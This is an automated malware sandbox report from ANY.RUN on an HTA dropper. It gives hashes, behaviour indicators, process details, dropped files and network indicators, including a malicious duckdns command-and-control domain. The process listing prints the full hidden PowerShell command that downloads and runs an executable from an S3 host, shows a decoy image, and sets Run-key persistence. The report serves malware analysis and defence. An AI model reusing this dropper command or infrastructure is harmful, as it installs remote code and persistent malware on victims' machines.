analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

MSHTAPayloadawalobina.hta

Full analysis: https://app.any.run/tasks/3ded9aa6-72fb-42bb-9dcb-6313dc3359fa
Verdict: Malicious activity
Analysis date: January 10, 2019, 19:41:59
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
autoit
Indicators:
MIME: text/html
File info: HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5:

966AB78B142D9AAED55E86E26AD73887

SHA1:

4453F3838CE737F8E7B62545A1A970F21C4A397E

SHA256:

3486A83F7060F11655B744238DE048E7D9F6E9F41E73FC0635CEF356DB12BE31

SSDEEP:

96:wBvaY1zUMd6VfRjF/Vaqk8k236yOXOuJWksRRzMo:wb1zUrbfaIk+pU6xRRzP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes the autorun value in the registry

      • powershell.exe (PID: 3716)
      • lwh.exe (PID: 2736)

    • Application was dropped or rewritten from another process

      • lwh.exe (PID: 3768)
      • lwh.exe (PID: 2736)
      • WfFyPbj.exe (PID: 2632)

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3716)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3716)
      • WfFyPbj.exe (PID: 2632)

    • Executes PowerShell scripts

      • iexplore.exe (PID: 3440)

    • Uses ATTRIB.EXE to modify file attributes

      • powershell.exe (PID: 3716)

    • Application launched itself

      • lwh.exe (PID: 3768)

    • Drop AutoIt3 executable file

      • WfFyPbj.exe (PID: 2632)

    • Connects to unusual port

      • RegSvcs.exe (PID: 1144)

  • INFO

    • Changes internet zones settings

      • iexplore.exe (PID: 3000)

    • Reads internet explorer settings

      • iexplore.exe (PID: 3440)

    • Application launched itself

      • iexplore.exe (PID: 3000)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3440)

    • Dropped object may contain Bitcoin addresses

      • WfFyPbj.exe (PID: 2632)
      • lwh.exe (PID: 3768)

    • Creates files in the user directory

      • iexplore.exe (PID: 3000)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.html | HyperText Markup Language (100)

EXIF

HTML

ContentType: text/html; charset=utf-8
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
9
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start iexplore.exe iexplore.exe no specs powershell.exe PhotoViewer.dll no specs wffypbj.exe attrib.exe no specs lwh.exe no specs lwh.exe regsvcs.exe

Process information

PID
CMD
Path
Indicators
Parent process
3000"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\MSHTAPayloadawalobina.hta.htmlC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3440"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3000 CREDAT:79873C:\Program Files\Internet Explorer\iexplore.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3716"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -WindowStyle hidden -nologo $osCheckMajor = [System.Environment]::OSVersion.Version | Select -Expand Major;$osCheckMinor = [System.Environment]::OSVersion.Version | Select -Expand Minor;$osVersion = "$osCheckMajor" + '.' + "$osCheckMinor";$poshVersion = $PSVersionTable.PSVersion.Major;if($poshVersion -eq 2){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";$decoyName = "$randomStr" + '.jpg';$decoyURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/guru.jpg';$decoyPath = "$env:APPDATA" + '\' + "$decoyName";$webClient = New-Object System.Net.WebClient;$webDownload = $webClient.DownloadFile($decoyURL, $decoyPath);Start-Process $decoyPath;Start-Sleep -s 7;New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;$peDirectURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/awaobinna.exe';$webClient = New-Object System.Net.WebClient;$webDownload = $webClient.DownloadFile($peDirectURL, $savePath)}elseif($poshVersion -ge 3){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";$decoyName = "$randomStr" + '.jpg';$decoyURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/guru.jpg';$decoyPath = "$env:APPDATA" + '\' + "$decoyName";Invoke-WebRequest -Uri $decoyURL -OutFile $decoyPath;Start-Process $decoyPath;Start-Sleep -s 7;New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;$peDirectURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/awaobinna.exe';Invoke-WebRequest -Uri $peDirectURL -OutFile $savePath};Start-Process $savePath;attrib +h +s $savePath;""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2984C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}C:\Windows\system32\DllHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2632"C:\Users\admin\AppData\Roaming\WfFyPbj.exe" C:\Users\admin\AppData\Roaming\WfFyPbj.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3132"C:\Windows\system32\attrib.exe" +h +s C:\Users\admin\AppData\Roaming\WfFyPbj.exeC:\Windows\system32\attrib.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Attribute Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3768"C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe" fld=ktl C:\Users\admin\AppData\Local\Temp\88465914\lwh.exeWfFyPbj.exe
User:
admin
Company:
AutoIt Team
Integrity Level:
MEDIUM
Description:
AutoIt v3 Script
Exit code:
0
Version:
3, 3, 14, 5
2736C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe C:\Users\admin\AppData\Local\Temp\88465914\VTOCIC:\Users\admin\AppData\Local\Temp\88465914\lwh.exe
lwh.exe
User:
admin
Company:
AutoIt Team
Integrity Level:
MEDIUM
Description:
AutoIt v3 Script
Exit code:
0
Version:
3, 3, 14, 5
1144"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
lwh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Services Installation Utility
Version:
4.6.1055.0 built by: NETFXREL2
Total events
1 767
Read events
1 608
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
4
Text files
53
Unknown types
1

Dropped files

PID
Process
Filename
Type
3000iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico
MD5:
SHA256:
3000iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3716powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\84U14WF1C1GOHJU9ZFQS.temp
MD5:
SHA256:
2632WfFyPbj.exeC:\Users\admin\AppData\Local\Temp\88465914\ibw.mp4text
MD5:7CBA224E33403861F74573F8464D3D2F
SHA256:AD912169922C0F25F333CF4235429B63C567E349080A4CB6C78F2F49F8279F7E
3716powershell.exeC:\Users\admin\AppData\Roaming\WfFyPbj.jpgimage
MD5:38C3261D8E98A3BBBCFAFF8C259A9DDE
SHA256:98F6E62ABC7A08FF41584696CF46DA99C86C3EEF95D1CF3BF6262054E71E4E74
2632WfFyPbj.exeC:\Users\admin\AppData\Local\Temp\88465914\idn.docxtext
MD5:B0341DF38A4783109002AB4CF33C9D55
SHA256:C2073FFEBE269E494A467760438C9F2A34C109584965555E4A5FFE2FEBEB4858
3440iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019011020190111\index.datdat
MD5:CBA4D69DFFAFA00DB6B321A46491D5EF
SHA256:AC378E39A16B3E8A1B83485D3563C690EF744D9C2B3428FD3D187BF15E561A97
2632WfFyPbj.exeC:\Users\admin\AppData\Local\Temp\88465914\jxn.txttext
MD5:11D8800A15EBDB99487EDEBC06EF86E8
SHA256:7E63EF6F2A78B51AD2915D0CA50D0B0D0420600BA8F4A99EE6CDAE3AC7868A99
2632WfFyPbj.exeC:\Users\admin\AppData\Local\Temp\88465914\emu.mp3text
MD5:5709F32A91FE4FD8DB720BCABD3546D1
SHA256:C9992EB858B214114AEF5F2BDFAE725920E4550A4B8E77301144D9363E3F9760
2632WfFyPbj.exeC:\Users\admin\AppData\Local\Temp\88465914\dwa.icmtext
MD5:3A5452C2AF12FB5F972F8FF46C91888C
SHA256:CB857B22E73625770E18EC4029DA260E7F99F4738E847B16B5EAA56D294F687B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
15
DNS requests
8
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3000
iexplore.exe
GET
200
13.107.21.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3000
iexplore.exe
13.107.21.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3716
powershell.exe
52.219.32.73:443
s3-ap-southeast-1.amazonaws.com
Amazon.com, Inc.
SG
unknown
1144
RegSvcs.exe
45.249.90.124:1609
idea1com2002.duckdns.org
Korea Telecom
KR
malicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 13.107.21.200
  • 204.79.197.200
whitelisted
s3-ap-southeast-1.amazonaws.com
  • 52.219.32.73
shared
idea1com2002.duckdns.org
  • 45.249.90.124
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
MSHTAPayloadawalobina.hta